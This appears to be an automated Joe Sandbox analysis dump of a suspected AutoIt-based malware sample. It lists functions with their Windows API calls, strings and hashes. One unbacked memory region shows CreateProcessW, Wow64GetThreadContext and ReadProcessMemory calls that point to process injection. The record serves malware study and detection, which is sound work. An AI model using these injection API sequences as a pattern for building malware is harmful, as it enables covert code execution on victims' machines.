Part of subcall function 00EA3041: LoadIconW.USER32(000000A9), ref: 00EA30F2
Part of subcall function 00EA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EA3101

Strings

#, xrefs: 00EA3AFB
0, xrefs: 00EA3AF4
AutoIt v3, xrefs: 00EA3B05

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: a1fadd943d4f47cfa19295411deecc5990665f55958e09dba2bb45fde2263cd4
Instruction ID: 239020a1f3f6989a36d75e5445e3377532027a115ff8d8085378268bdb0dbad9
Opcode Fuzzy Hash: a1fadd943d4f47cfa19295411deecc5990665f55958e09dba2bb45fde2263cd4
Instruction Fuzzy Hash: 312135B0D10308AFEB10DFA4EC59B9D7BB4EB09B11F00012AF514BA2A1D3F55A44AF84

Function 00EA3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00EA36D2
KillTimer.USER32(?,00000001), ref: 00EA36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EA371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EA372A
CreatePopupMenu.USER32 ref: 00EA373E
PostQuitMessage.USER32(00000000), ref: 00EA374D

Strings

TaskbarCreated, xrefs: 00EA3725

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4e0fec07e7bf7956844131c1825907fa6e21461998c65c0d19a960684ae4b0c0
Instruction ID: db3928f0d1b122692a8d5b55aad2ecead08836e175512efc3669a77dcf2b3d1c
Opcode Fuzzy Hash: 4e0fec07e7bf7956844131c1825907fa6e21461998c65c0d19a960684ae4b0c0
Instruction Fuzzy Hash: 44413CB1204509BBDB209F78DC09BBA3B95EB4E704F102136F501FE2B3CAA1BD45B261

Function 00EA3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3OutputDebug, xrefs: 00EA3892
CMDLINERAW, xrefs: 00EA37FB
/AutoIt3ExecuteLine, xrefs: 00EA38A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00EA37AE
/ErrorStdOut, xrefs: 00EA387D
CMDLINE, xrefs: 00EA3822
/AutoIt3ExecuteScript, xrefs: 00EA38BC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: b723cddbcdd94487099ccb0b4d6509aeba1a3101a28405e6dacb714de0334ba2
Instruction ID: 562283021486869557767ade243f843138c3032c70993e5aef3109a67a71cd08
Opcode Fuzzy Hash: b723cddbcdd94487099ccb0b4d6509aeba1a3101a28405e6dacb714de0334ba2
Instruction Fuzzy Hash: 1EA1627191022D9ACF05EBA4DC91EEEB7B8FF5A300F401529F415BB192DF74AA09CB60

Function 016F4710 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016F47E1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016F4A07

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: 837011c72619598efd3dfcd491945f3e07f0ef25af6d78dfa130e739650ccd5c
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 32A1F774E00209EBDB14CFA8C895BEEBBB5BF48305F20815DE615BB280DB759A41CF94

Function 00EA39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EA3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EA3A24
ShowWindow.USER32(00000000,?,?), ref: 00EA3A38
ShowWindow.USER32(00000000,?,?), ref: 00EA3A41

Strings

edit, xrefs: 00EA3A1E
AutoIt v3, xrefs: 00EA39FB, 00EA3A00, 00EA3A01

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7e2bbd6d426f386a82ea624e9c9433c198a2a8b124efcb3dab38b6e648bcc6db
Instruction ID: 99d68ac2b9ab0004f8e10c42181891235d2f46916ccabec667375f838fcf1867
Opcode Fuzzy Hash: 7e2bbd6d426f386a82ea624e9c9433c198a2a8b124efcb3dab38b6e648bcc6db
Instruction Fuzzy Hash: 96F03A705102987EEB3057636C19E2B3E7DD7C7F50F00003AF910B2170C2A10841EAB0

Function 016F44B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 016F43A0: Sleep.KERNELBASE(000001F4), ref: 016F43B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016F4609

Strings

DK9Z8RRO3HKCI621JULX5, xrefs: 016F466C, 016F466F

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID: CreateFileSleep
String ID: DK9Z8RRO3HKCI621JULX5
API String ID: 2694422964-304194736
Opcode ID: 56d6b5ba0c4846e2c676d8d20005cf4ef3ba53124857636938e9be01ac24f60a
Instruction ID: d8cc51c5a5769efb516f4e9db5e3693caa94646263f9a041ad61bd21733309bf
Opcode Fuzzy Hash: 56d6b5ba0c4846e2c676d8d20005cf4ef3ba53124857636938e9be01ac24f60a
Instruction Fuzzy Hash: EF619330D04258DAEF11DBA4D854BEFBB75AF19300F00419DE249BB2C1DBBA5B45CBA9

Function 00EA407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EDD3D7

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

_memset.LIBCMT ref: 00EA40FC
_wcscpy.LIBCMT ref: 00EA4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EA4160

Strings

Line: , xrefs: 00EDD400

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 87c63c8644adf7361aea03b18a37ac0b4a34d18dc6edce1b16f51f46d958cc0b
Instruction ID: 990d0704853981b5fe5467dc24251a2175e85bc0321c34dc0e76eb04c2a1dbe6
Opcode Fuzzy Hash: 87c63c8644adf7361aea03b18a37ac0b4a34d18dc6edce1b16f51f46d958cc0b
Instruction Fuzzy Hash: F931CFB1008304AAD320EB60DC46FDB77D8AB9A714F10561EF685BA091DBB0A649D793

Function 00EC541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00EC547B
_memcpy_s.LIBCMT ref: 00EC54ED
__read_nolock.LIBCMT ref: 00EC554B
__filbuf.LIBCMT ref: 00EC556E
_memset.LIBCMT ref: 00EC55B2

Part of subcall function 00EC8B28: __getptd_noexit.LIBCMT ref: 00EC8B28

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 48dcdfaa37e73da0758fe95d488ac8602ef8832a0221dd9e4e639087c01478d2
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 85518972A00B059BCB288E65DA40FAD77A6FF40325F14562DF836B62D0D772ADD28B40

Function 00EA686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00EA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EA4E0F

_free.LIBCMT ref: 00EDE263
_free.LIBCMT ref: 00EDE2AA

Part of subcall function 00EA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EA6BAD

Strings

Bad directive syntax error, xrefs: 00EDE292
>>>AUTOIT SCRIPT<<<, xrefs: 00EDE039

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 5092747697b68b0d894e137fcc1d511886f7ecc55eec985588c05deff1ec4722
Instruction ID: 1c52bd0989f6ceb083d1887d64e9647ce309420d665de4ced491179a652a85c5
Opcode Fuzzy Hash: 5092747697b68b0d894e137fcc1d511886f7ecc55eec985588c05deff1ec4722
Instruction Fuzzy Hash: 81915A719102199FCF04EFA4CC859EEB7B8FF09314B14542AE816BF3A1DB75A906DB50

Function 00EA35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EA35A1,SwapMouseButtons,00000004,?), ref: 00EA35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EA35A1,SwapMouseButtons,00000004,?,?,?,?,00EA2754), ref: 00EA35F5
RegCloseKey.KERNELBASE(00000000,?,?,00EA35A1,SwapMouseButtons,00000004,?,?,?,?,00EA2754), ref: 00EA3617

Strings

Control Panel\Mouse, xrefs: 00EA35D2

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: c93b7894572caddeb9c8a94a9efa95b38391773c678fb22373386ed7bd5a9dae
Instruction ID: efdd9313d67a0c44949ef296a2490b9a76b2c965e75018b86b2478f26815329c
Opcode Fuzzy Hash: c93b7894572caddeb9c8a94a9efa95b38391773c678fb22373386ed7bd5a9dae
Instruction Fuzzy Hash: 4C114871910208BFDB20CFA4DC40DEFBBB8EF49744F0054AAF805EB210E271AE45AB60

Function 016F33A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016F3B5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016F3BF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016F3C13

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction ID: 42a46d65535759fc12ba550805828eea49c3a14c35433e1185ad63d4bfd7201a
Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction Fuzzy Hash: DC62D730A142589AEB24CFA4CC50BDEB776FF58700F1091A9D20DEB394E7769E81CB59

Function 00F0955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00EA4EE5: _fseek.LIBCMT ref: 00EA4EFD

Part of subcall function 00F09734: _wcscmp.LIBCMT ref: 00F09824
Part of subcall function 00F09734: _wcscmp.LIBCMT ref: 00F09837

_free.LIBCMT ref: 00F096A2
_free.LIBCMT ref: 00F096A9
_free.LIBCMT ref: 00F09714

Part of subcall function 00EC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EC9A24), ref: 00EC2D69
Part of subcall function 00EC2D55: GetLastError.KERNEL32(00000000,?,00EC9A24), ref: 00EC2D7B

_free.LIBCMT ref: 00F0971C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: e3b4b8e3c4f827d698a04b9682a3121ff283e3c19169037b98acad6a5a523d3a
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: F3514FB1D04218AFDF259F64CC81A9EBBB9EF88300F10549EB209A7281DB715A81DF58

Function 00EC470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EC47A0
__flush.LIBCMT ref: 00EC47C0
__write.LIBCMT ref: 00EC47F3
__flsbuf.LIBCMT ref: 00EC4821

Part of subcall function 00EC8B28: __getptd_noexit.LIBCMT ref: 00EC8B28

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 448c0d4ddcab7a9862f1b6ef255462e6d1336fef7d8b39a8ea65de47e96c4d10
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 194106B5A007459BDB1C8EA8CAA0FAE77A5EF41364B10A13EF815A76C0D772DD428B40

Function 00EA7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EDEA39
GetOpenFileNameW.COMDLG32(?), ref: 00EDEA83

Part of subcall function 00EA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EA4743,?,?,00EA37AE,?), ref: 00EA4770

Part of subcall function 00EC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC07B0

Strings

X, xrefs: 00EDEA51

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 28e6be8a10baf8c172d59a589bcb7fb7abf6229c494cb26912b76291da6fb761
Instruction ID: af0da7616170bcaa431146f244839af3ccb81eee7e9d5de3dbb7753324509a85
Opcode Fuzzy Hash: 28e6be8a10baf8c172d59a589bcb7fb7abf6229c494cb26912b76291da6fb761
Instruction Fuzzy Hash: F621C671A002489BCB11DF94CC45BEE7BFDAF49714F00505AE548BB342DBB4598E9FA1

Function 00F08D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F08DAC
__fread_nolock.LIBCMT ref: 00F08DC1

Strings

EA06, xrefs: 00F08DF3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: fa150aae591e6f450e54e575c40495334c7f30401d5ae812a73a93cb2c0ad3b5
Instruction ID: 394ce78db6b6f67607df3f36380df15e0ec678f5793d8d6ae56528cf4516c969
Opcode Fuzzy Hash: fa150aae591e6f450e54e575c40495334c7f30401d5ae812a73a93cb2c0ad3b5
Instruction Fuzzy Hash: 7001B972D04218BEDB18CAA8C856FEE7BF8DB15311F00459EF592E21C1E975E6089760

Function 00F098E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00F098F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F0990F

Strings

aut, xrefs: 00F09909

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 440cba64d614f662c5dfaffa52e878ada848c2c025b1cb28f3ed76f615e7169a
Instruction ID: e67bc662c98d571e5d463112e6483a7be767bcda83094bf4dd5ce2246b4c5017
Opcode Fuzzy Hash: 440cba64d614f662c5dfaffa52e878ada848c2c025b1cb28f3ed76f615e7169a
Instruction Fuzzy Hash: 3ED05E7958030DABDB609BA0DC0EF9A773CE704701F0002B1BF54D11E1EAB1959E9BA1

Function 00F1CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eb2968b7a045d5ab0459f787097939fec10885fa238f5a8d171746155f6ceb8
Instruction ID: ebab4ca379180be4ce057dbce3615375a1deeccc54d65b0b530a797a7fbca47f
Opcode Fuzzy Hash: 5eb2968b7a045d5ab0459f787097939fec10885fa238f5a8d171746155f6ceb8
Instruction Fuzzy Hash: D6F15B71A083019FC714DF28C480A6ABBE5FF89324F14892EF8999B352D734E945DF92

Function 00EAF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC0193
Part of subcall function 00EC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC019B
Part of subcall function 00EC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC01A6
Part of subcall function 00EC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC01B1
Part of subcall function 00EC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC01B9
Part of subcall function 00EC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC01C1

Part of subcall function 00EB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EAF930), ref: 00EB6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EAF9CD
OleInitialize.OLE32(00000000), ref: 00EAFA4A
CloseHandle.KERNEL32(00000000), ref: 00EE45C8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

